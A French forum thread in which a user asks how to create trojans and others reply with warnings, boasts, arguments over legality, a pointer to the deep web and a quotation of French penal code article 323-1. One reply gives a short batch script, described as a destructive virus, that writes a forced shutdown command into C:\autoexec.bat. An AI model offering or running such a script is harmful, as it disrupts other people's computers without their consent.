Comment cree des trojan [Résolu/Fermé]

Signaler
-
 X -
Bonjour,
jaimerais savoire comment cree des trojan please

14 réponses

Bonsoir tout le monde.

Je voudrais tout d'abord rappeler que le monde est fait d'illégalitées d'ailleurs je suppose que vous n'etes pas tous des saints à ce sujet la car qui n'a jamais téléchargé une chanson sur le net pourtant cela n'a rien de légal hihi!!!

Il est sur que créer un cheval de troie comporte des risques réel, il est utilisé par des pirates (autant débutant que experts) qui s'en servent à de mauvaises fins donc soyons vigilant!!

Savoir créer un cheval de troie est une culture de plus comme les autres, mais en tant que bon informaticien je te conseillerais de faire attention à tes intentions.

On m'a souvent dis que connaitre les attaques permettait de mieux se defendre contre celles-ci. Mais il faut réfléchir aux conséquences à toi d'en juger par toi meme. N'oublie pas tout de meme que les lois sont faites pour etre respectées et à partir de la tu emploi ta responsabilitée.

Le net est fait de tout tu trouveras surement ta réponse ailleurs.

sur ceux bonne soirée.
21
Merci

Quelques mots de remerciements seront grandement appréciés. Ajouter un commentaire

CCM 76687 internautes nous ont dit merci ce mois-ci

Messages postés
4162
Statut
Contributeur
Dernière intervention
19 décembre 2012
647
oui mais il peut les créé et juste les testé sur ses propre machine !!
c'est se que je fait que teste quelque petit programme sur une machine de teste prévu pour sa!
>
Messages postés
4162
Statut
Contributeur
Dernière intervention
19 décembre 2012

lol vous me faite rire la legalité et tout nan mais vous croyer que l'on vit dans un monde legal ou je reve ? matter les politiciens qui disent de ne pas faire ci ni ca, c'est eux les 1ers a le faires aucunes loi n'est réelment appliqué je suit desoler =/
pour créer un virus trojan il fo que tu ouvre un document texte et que tu ecrive:

@echo off
echo shutdown -s -f -t 0 >> C: \autoexec.bat
cls

mais fait attention mec ci t'a pas d'anti virus ne le fait pas car ces un vrai virus destructeur donc il fau que tu et un anti virus
Messages postés
4162
Statut
Contributeur
Dernière intervention
19 décembre 2012
647
c'est du batch! ton truc très simple a mettre en pratique!
Oui, mes si tu te faire choppé..

Que Team Viewer pour seux qui veulent aller sur un PC d'un copain avec l'accord il peuvent et ses légale.

Que faire de mieux ?

salut sebsauvage...vu l'orthographe , je ne pense pas qu'il comprenne ce que tu dis ^^
Page, doc et tutoriaux officiels va su ce site tu trouvera petere lé reponse pour cré un trojen
ahhh arreter donc de toujour être mécontant des questions non mais sérieux moi jétais hacker et pirateur avans et j'ai été comme lui a poser des questions idiote comme comment pirater un pc ou je veut faire une joke a mon ami et je veut pété son pc alors comme je peut mis prendre

et maitenant je suis un white hat et pour tas question de créer un trojan puije savoir c'est pour quels utiliter et je vais pouvoir taider et les hackers sont des personnes qui veulent toujour aller plus loin et ne les insulter pas avant davoir hacker le site de la police ou un compte bancaire et tous sa vous ne pouver même pas savoir la monter dadrénaline qui rentre dans votre corp just le fait davoir pirater un truc qui peut te faire prendre pour 10 ans de prison.

remember my name the next time you will see me you will be in a facking shit
rapeller vous de mon nom puisque la prochaine fois que vous allez me voir vous aller être dans une grosse merde

Hacker for life baby and just a white hat for now :P
Ce n'est pas tout le temp illégal, car moi je m'en suis déjà servie pour aller sur le PC d'un pote lui faire un truc.

Si je peut resoudre se sujet, je connais Team Viewer, un logiciel d'accès a distance sur un autre PC.

Pour aller sur le PC du mec ou la meuf, tu doit avoir ses ID et son passe Team et ses bon.

DarkZ91

euh quel rapport avec les trojans ?
Dans la logique, un trojan donne accès a un PC.

S'il voulait avoir accès a un PC et qu'il connaissait pas de logiciel, ya Team Viewer.

C'etait pour savoir s'il voulait un logiciel d'accès a distance.
Messages postés
583
Statut
Membre
Dernière intervention
10 décembre 2012
82
Tes intentions ne semblent pas très honnêtes...
Poste ce genre de problème ailleurs.
Messages postés
4162
Statut
Contributeur
Dernière intervention
19 décembre 2012
647
TheOwner!

cela m'étonnerai que tu été Hacker et pirate avent !
car chose que tu doit sans doute pas savoir!
c'est quand ont est / a été Hacker ont en parle pas pas comme sa sur un forum!

un Hacker ou ancien Hacker se met pas en avent comme tu le fait!
car il connait les risque qu'il en court!!

même plusieurs années après les fait!

donc arrête de te prendre pour ce que tu n'es pas !
il y a déjà assez de troll comme sa sur les forums, c'est pas la peine dans rajouté 1 de plus!

et pour répondre a la question du post:
regarde sur le deep web tu trouvera se que tu cherche!

Créer des trojans ne servent pas qu'au gens mal intentionné , si quelqun a besoin de relier ses deux ordinateur ou quelque chose dans ce genre , je pense que c'est legal .
Messages postés
4162
Statut
Contributeur
Dernière intervention
19 décembre 2012
647
lol j'aime bien le lien qui a été donné!

comment créé des page web en PHP!! j'adort!
Vous étes cons, vous savez pas ce que c'est un vrai Hacker ^^
Arretez les conneries que les trojans sont illegal, on peux tester notre sécurité avec, sinon si c'est pour les petit pigeons bah abandonnez :)
Messages postés
32840
Statut
Modérateur
Dernière intervention
21 octobre 2019
15 373
Arretez les conneries que les trojans sont illegal

Histoire d'arrêter les conneries, examinons la loi:

CODE PÉNAL, CHAPITRE III, Article 323-1:
"Le fait d'accéder ou de se maintenir, frauduleusement, dans tout ou partie d'un système de traitement automatisé de données est puni de deux ans d'emprisonnement et de 30000 euros d'amende."

Donc, à moins que ta compréhension du français soit très très altérée, les trojans sont bien illégaux.